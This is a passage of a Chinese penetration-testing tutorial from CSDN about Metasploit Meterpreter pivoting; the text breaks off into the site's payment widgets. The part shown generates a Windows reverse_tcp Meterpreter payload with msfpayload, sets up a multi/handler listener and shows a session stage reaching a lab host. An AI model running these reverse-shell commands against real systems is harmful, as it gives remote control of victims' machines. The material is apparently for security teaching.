Metasploit渗透技巧:后渗透Meterpreter代理

本文详细介绍了如何使用Metasploit框架中的Meterpreter进行渗透测试,包括如何获取Meterpreter会话,使用portfwd进行端口转发,以及如何设置和利用pivot进行多级代理,以访问受限的内部网络。此外,还提到了二级和三级代理的建立过程,强调了根据实际环境选择合适代理方法的重要性。
摘要由CSDN通过智能技术生成

前言

Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击测试。它本身附带数百个已知软件漏洞的专业级漏洞攻击测试工具。

当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来测试那些未打过补丁或者刚刚打过补丁的漏洞。

正是因为Metasploit团队一直都在努力开发各种攻击测试工具,并将它们贡献给所有Metasploit用户,软件厂商再也不能推迟发布针对已公布漏洞的补丁了。

本文将科普下metasploit隧道代理的使用技巧。

0×00 获取meterpreter

1.首先生成可执行文件

root@kali:~# msfpayload windows/meterpreter/reverse_tcp  LHOST=192.168.101.105 LPORT=444 X > meter.exe

[!] ************************************************************************

[!] *               The utility msfpayload is deprecated!                  *

[!] *              It will be removed on or about 2015-06-08               *

[!] *                   Please use msfvenom instead                        *

[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/4333   *

[!] ************************************************************************

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

 Length: 281

Options: {"LHOST"=>"192.168.101.105", "LPORT"=>"444"}

2.启动msfconsole,监听反连端口

root@kali:~# msfconsole

[*] Starting the Metasploit Framework console.../ 

Taking notes in notepad? Have Metasploit Pro track & report

your progress and findings -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]]

+ -- --=[ 1386 exploits - 863 auxiliary - 236 post        ]

+ -- --=[ 342 payloads - 37 encoders - 8 nops             ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler 

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 0.0.0.0

LHOST => 0.0.0.0

msf exploit(handler) > set LPORT 444

LPORT => 444

msf exploit(handler) > show options 

Module options (exploit/multi/handler):

Name  Current Setting  Required  Description

 ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)

   LHOST     0.0.0.0          yes       The listen address

   LPORT     444              yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Wildcard Target

msf exploit(handler) > run 

[*] Started reverse handler on 0.0.0.0:444 

[*] Starting the payload handler...

3.在xp-test1执行meter.exe,attacker获得 meterperter

msf exploit(handler) > run 

[*] Started reverse handler on 0.0.0.0:444 

[*] Starting the payload handler...

[*] Sending stage (770048 bytes) to 192.168.101.107

<

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值